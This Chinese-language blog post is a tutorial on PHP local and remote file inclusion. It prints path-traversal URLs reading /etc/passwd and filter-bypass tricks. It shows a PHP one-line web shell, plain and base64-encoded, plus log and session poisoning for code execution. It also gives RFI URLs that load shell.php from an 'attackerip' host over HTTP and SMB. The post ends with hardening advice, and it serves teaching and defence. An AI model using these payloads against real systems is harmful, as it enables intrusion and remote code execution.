<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="文件包含文件包含是一个常见的Web应用程序漏洞，服务器端语言（例如PHP或JSP）可以动态包含外部脚本，从而减小了脚本大小并实现了代码重用。但是一旦没有正确处理，攻击者可能会非法包含本地和远程文件，从而可能导致源代码泄露、敏感数据泄露甚至执行代码。文件包含分为两种类型，即本地文件包含（LFI）和远程文件包含（RFI）。 LFI vs RFI远程文件包含几乎一定是本地文件包含，反之则不然。主要原因有">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈文件包含&#x2F;目录浏览漏洞">
<meta property="og:url" content="http://example.com/2021/04/07/%E6%B5%85%E8%B0%88%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB:%E7%9B%AE%E5%BD%95%E6%B5%8F%E8%A7%88%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="Y0suke2021&#39;s Blog">
<meta property="og:description" content="文件包含文件包含是一个常见的Web应用程序漏洞，服务器端语言（例如PHP或JSP）可以动态包含外部脚本，从而减小了脚本大小并实现了代码重用。但是一旦没有正确处理，攻击者可能会非法包含本地和远程文件，从而可能导致源代码泄露、敏感数据泄露甚至执行代码。文件包含分为两种类型，即本地文件包含（LFI）和远程文件包含（RFI）。 LFI vs RFI远程文件包含几乎一定是本地文件包含，反之则不然。主要原因有">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-04-07T03:15:33.000Z">
<meta property="article:modified_time" content="2021-04-08T03:31:08.550Z">
<meta property="article:author" content="y0suke2021">
<meta property="article:tag" content="academy">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2021/04/07/%E6%B5%85%E8%B0%88%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB:%E7%9B%AE%E5%BD%95%E6%B5%8F%E8%A7%88%E6%BC%8F%E6%B4%9E/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>浅谈文件包含/目录浏览漏洞 | Y0suke2021's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Y0suke2021's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/07/%E6%B5%85%E8%B0%88%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB:%E7%9B%AE%E5%BD%95%E6%B5%8F%E8%A7%88%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="y0suke2021">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Y0suke2021's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          浅谈文件包含/目录浏览漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-04-07 11:15:33" itemprop="dateCreated datePublished" datetime="2021-04-07T11:15:33+08:00">2021-04-07</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-04-08 11:31:08" itemprop="dateModified" datetime="2021-04-08T11:31:08+08:00">2021-04-08</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><p>文件包含是一个常见的Web应用程序漏洞，服务器端语言（例如PHP或JSP）可以动态包含外部脚本，从而减小了脚本大小并实现了代码重用。但是一旦没有正确处理，攻击者可能会非法包含本地和远程文件，从而可能导致源代码泄露、敏感数据泄露甚至执行代码。文件包含分为两种类型，即本地文件包含（LFI）和远程文件包含（RFI）。</p>
<h3 id="LFI-vs-RFI"><a href="#LFI-vs-RFI" class="headerlink" title="LFI vs RFI"></a>LFI vs RFI</h3><p>远程文件包含几乎一定是本地文件包含，反之则不然。主要原因有两点：</p>
<ul>
<li>只能控制文件名的一部分，不能控制整个协议</li>
<li>配置阻止了远程文件包含，比如PHP中设置<code>allow_url_include=0</code>。</li>
</ul>
<h3 id="常见位置"><a href="#常见位置" class="headerlink" title="常见位置"></a>常见位置</h3><p>LFI最常见的地方是模版引擎，例如这种url参数：<code>/index.php?page=about</code>。其次是语言选择，例如：<code>?lang=en</code>。其他可能出现的地方包括头像加载和sql二次注入等。</p>
<h1 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h1><p>假设一个网站地址是<code>http://example.com/</code>，首页选择语言后url变成了<code>http://example.com/index.php?language=es.php</code>，以下示例皆以读取<code>/etc/passwd</code>为目标。</p>
<h3 id="基本包含"><a href="#基本包含" class="headerlink" title="基本包含"></a>基本包含</h3><p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;language&#x27;</span>]);</span><br></pre></td></tr></table></figure>

<p>恶意url：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=/etc/passwd</span><br></pre></td></tr></table></figure>



<h3 id="路径浏览"><a href="#路径浏览" class="headerlink" title="路径浏览"></a>路径浏览</h3><p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;./languages/&quot;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;language&#x27;</span>]);</span><br></pre></td></tr></table></figure>

<p>恶意url:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example/index.php?language=../../../../../../../../../etc/passwd</span><br></pre></td></tr></table></figure>

<p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="string">&quot;lang_&quot;</span> . <span class="variable">$_GET</span>[<span class="string">&#x27;language&#x27;</span>]);</span><br></pre></td></tr></table></figure>

<p>恶意url：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=/../../../../../etc/passwd</span><br></pre></td></tr></table></figure>



<h3 id="绕过黑名单"><a href="#绕过黑名单" class="headerlink" title="绕过黑名单"></a>绕过黑名单</h3><p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$language</span> = str_replace(<span class="string">&#x27;../&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;language&#x27;</span>]);</span><br></pre></td></tr></table></figure>

<p>恶意url：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=....//....//....//....//....//....//....//....//etc/passwd</span><br></pre></td></tr></table></figure>

<p>PHP&lt;=5.3.4可以通过url编码绕过过滤：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fetc%2fpasswd</span><br></pre></td></tr></table></figure>



<h3 id="绕过后缀追加"><a href="#绕过后缀追加" class="headerlink" title="绕过后缀追加"></a>绕过后缀追加</h3><p>后台代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;language&#x27;</span>] . <span class="string">&quot;.php&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>可以通过<code>php://filter</code>伪协议读取PHP代码：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=php://filter/read=convert.base64-encode/resource=config</span><br></pre></td></tr></table></figure>

<p>PHP&lt;=5.5可以使用空字节截断追加的后缀：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=/etc/passwd%00</span><br></pre></td></tr></table></figure>



<h1 id="LFI到RCE"><a href="#LFI到RCE" class="headerlink" title="LFI到RCE"></a>LFI到RCE</h1><h3 id="通过Apache或Nginx日志"><a href="#通过Apache或Nginx日志" class="headerlink" title="通过Apache或Nginx日志"></a>通过Apache或Nginx日志</h3><p>通过将一句话木马（<code>&lt;?php system($_GET[&#39;cmd&#39;]); ?&gt;</code>）写入HTTP请求头，例如<code>User-Agent</code>，发起请求污染日志，再利用LFI漏洞包含日志文件，实现RCE。可利用的文件包括：<code>/var/log/apache2/access.log</code>，<code>/var/log/nginx/access.log</code>，<code>/var/log/sshd.log</code>，<code>/var/log/mail</code>，<code>/var/log/vsftpd.log</code>，<code>/proc/self/environ</code>（CGI方式启动的PHP会将User-Agent写到环境变量，参考<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/80e46a80fdbd">比较CGI，FastCGI，PHP-CGI与PHP-FPM的区别</a>）。</p>
<h3 id="通过PHP-Session文件"><a href="#通过PHP-Session文件" class="headerlink" title="通过PHP Session文件"></a>通过PHP Session文件</h3><p>PHP Session默认写入到Linux的<code>/var/lib/php/sessions/</code>目录，例如cookie中设置为<code>PHPSESSID=el4ukv0kqbvoirg7nkp4dncpk3</code>将生成<code>/var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3</code>文件。如果session中记录了某个参数，则可以将一句话木马写入参数，从而污染session文件，再通过LFI session文件实现RCE。</p>
<h1 id="其他伪协议"><a href="#其他伪协议" class="headerlink" title="其他伪协议"></a>其他伪协议</h1><h3 id="expect"><a href="#expect" class="headerlink" title="expect://"></a>expect://</h3><p>默认未开启。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=expect://id</span><br></pre></td></tr></table></figure>



<h3 id="data"><a href="#data" class="headerlink" title="data://"></a>data://</h3><p>需要开启<code>allow_url_include</code>。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&amp;cmd=id</span><br><span class="line"># 参数中的字符串是 &lt;?php system($_GET[&#x27;cmd&#x27;]); ?&gt; 的base64编码。</span><br></pre></td></tr></table></figure>



<h3 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h3><p>需要开启<code>allow_url_include</code>。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> curl -s -X POST --data <span class="string">&quot;&lt;?php system(&#x27;id&#x27;); ?&gt;&quot;</span> <span class="string">&quot;http://example.com/index.php?language=php://input&quot;</span> | grep uid</span></span><br><span class="line"></span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br></pre></td></tr></table></figure>



<h3 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h3><p>默认未开启。</p>
<p>将木马PHP文件打包成zip文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">echo</span> <span class="string">&#x27;&lt;?php system($_GET[&#x27;</span>cmd<span class="string">&#x27;]); ?&gt;&#x27;</span> &gt; exec.php</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> zip malicious.zip exec.php &amp;&amp; rm exec.php</span></span><br></pre></td></tr></table></figure>

<p>上传后通过<code>zip://malicious.zip#exec.php</code>（需要进行url编码，否则会被识别为html片段）访问：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=zip://malicious.zip%23exec.php&amp;cmd=id</span><br></pre></td></tr></table></figure>



<h1 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h1><p>在PHP中实现远程文件包含需要开启配置中的<code>allow_url_fopen</code>（默认开启）和<code>allow_url_include</code>。然后在攻击机上运行http服务，这里用python来示范：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> <span class="built_in">echo</span> <span class="string">&quot;&lt;?php system(<span class="variable">$_GET</span>[&#x27;cmd&#x27;]); ?&gt;&quot;</span> &gt; shell.php</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> python3 -m http.server 8080</span></span><br><span class="line"></span><br><span class="line">Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/ )</span><br></pre></td></tr></table></figure>

<p>恶意url（attckerip是攻击机ip地址）：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://example.com/index.php?language=http://attackerip/shell.php&amp;cmd=id</span><br></pre></td></tr></table></figure>



<h3 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h3><p>如果应用运行在windows下，可以通过SMB协议绕过<code>allow_url_include</code>限制。在攻击机上运行SMB服务：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash"> smbserver.py -smb2support share $(<span class="built_in">pwd</span>)</span></span><br><span class="line"></span><br><span class="line">Impacket v0.9.22.dev1+20200520.120526.3f1e7ddd - Copyright 2020 SecureAuth Corporation</span><br><span class="line"></span><br><span class="line">[*] Config file parsed</span><br><span class="line">[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0</span><br><span class="line">[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0</span><br><span class="line">[*] Config file parsed</span><br><span class="line">[*] Config file parsed</span><br><span class="line">[*] Config file parsed</span><br></pre></td></tr></table></figure>

<p>恶意url（attackerip是攻击机ip地址）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;example.com&#x2F;index.php?language&#x3D;\\attackerip\share\shell.php&amp;cmd&#x3D;whoami</span><br></pre></td></tr></table></figure>



<h1 id="加固建议"><a href="#加固建议" class="headerlink" title="加固建议"></a>加固建议</h1><h3 id="阻止目录浏览"><a href="#阻止目录浏览" class="headerlink" title="阻止目录浏览"></a>阻止目录浏览</h3><p>最佳实践是使用语言或框架内建的机制，例如PHP中使用<code>basename()</code>来获取参数中的文件名。</p>
<h3 id="正确过滤"><a href="#正确过滤" class="headerlink" title="正确过滤"></a>正确过滤</h3><p>验证扩展名时，优先使用语言内建的机制，其次是使用正则表达式进行验证。不过需要注意的是，语言内置的函数也有可能不安全。</p>
<h3 id="应用加固"><a href="#应用加固" class="headerlink" title="应用加固"></a>应用加固</h3><p>以PHP语言为例：</p>
<ul>
<li><p>关闭错误信息。编辑<code>php.ini</code>设置<code>display_errors=Off</code>。</p>
</li>
<li><p>禁用敏感函数。将函数名追加到配置的<code>disabled_functions</code>选项，建议禁用system, passthru, shell_exec, popen, proc_open, curl_exec, curl_multi_exec, parse_ini_file, show_source。</p>
</li>
<li><p>关闭远程包含。将<code>allow_url_fopen</code>和<code>allow_url_include</code>设置为Off。</p>
</li>
<li><p>防止访问非web相关的文件。在docker中运行应用，或者编辑<code>php.ini</code>添加<code>open_basedir=/var/www</code>来禁止访问web目录之外的文件。</p>
</li>
</ul>
<h3 id="使用WAF"><a href="#使用WAF" class="headerlink" title="使用WAF"></a>使用WAF</h3><p>最通用的方法就是利用WAF（Web应用程序防火墙），例如ModSecurity。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/academy/" rel="tag"># academy</a>
          </div>

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">1.</span> <span class="nav-text">文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#LFI-vs-RFI"><span class="nav-number">1.0.1.</span> <span class="nav-text">LFI vs RFI</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E4%BD%8D%E7%BD%AE"><span class="nav-number">1.0.2.</span> <span class="nav-text">常见位置</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">2.</span> <span class="nav-text">本地文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E5%8C%85%E5%90%AB"><span class="nav-number">2.0.1.</span> <span class="nav-text">基本包含</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%B7%AF%E5%BE%84%E6%B5%8F%E8%A7%88"><span class="nav-number">2.0.2.</span> <span class="nav-text">路径浏览</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E9%BB%91%E5%90%8D%E5%8D%95"><span class="nav-number">2.0.3.</span> <span class="nav-text">绕过黑名单</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%90%8E%E7%BC%80%E8%BF%BD%E5%8A%A0"><span class="nav-number">2.0.4.</span> <span class="nav-text">绕过后缀追加</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#LFI%E5%88%B0RCE"><span class="nav-number">3.</span> <span class="nav-text">LFI到RCE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%9A%E8%BF%87Apache%E6%88%96Nginx%E6%97%A5%E5%BF%97"><span class="nav-number">3.0.1.</span> <span class="nav-text">通过Apache或Nginx日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%80%9A%E8%BF%87PHP-Session%E6%96%87%E4%BB%B6"><span class="nav-number">3.0.2.</span> <span class="nav-text">通过PHP Session文件</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%B6%E4%BB%96%E4%BC%AA%E5%8D%8F%E8%AE%AE"><span class="nav-number">4.</span> <span class="nav-text">其他伪协议</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#expect"><span class="nav-number">4.0.1.</span> <span class="nav-text">expect:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#data"><span class="nav-number">4.0.2.</span> <span class="nav-text">data:&#x2F;&#x2F;</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-input"><span class="nav-number">4.0.3.</span> <span class="nav-text">php:&#x2F;&#x2F;input</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#zip"><span class="nav-number">4.0.4.</span> <span class="nav-text">zip:&#x2F;&#x2F;</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="nav-number">5.</span> <span class="nav-text">远程文件包含</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#windows"><span class="nav-number">5.0.1.</span> <span class="nav-text">windows</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8A%A0%E5%9B%BA%E5%BB%BA%E8%AE%AE"><span class="nav-number">6.</span> <span class="nav-text">加固建议</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%98%BB%E6%AD%A2%E7%9B%AE%E5%BD%95%E6%B5%8F%E8%A7%88"><span class="nav-number">6.0.1.</span> <span class="nav-text">阻止目录浏览</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%AD%A3%E7%A1%AE%E8%BF%87%E6%BB%A4"><span class="nav-number">6.0.2.</span> <span class="nav-text">正确过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BA%94%E7%94%A8%E5%8A%A0%E5%9B%BA"><span class="nav-number">6.0.3.</span> <span class="nav-text">应用加固</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8WAF"><span class="nav-number">6.0.4.</span> <span class="nav-text">使用WAF</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">y0suke2021</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">1</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">y0suke2021</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
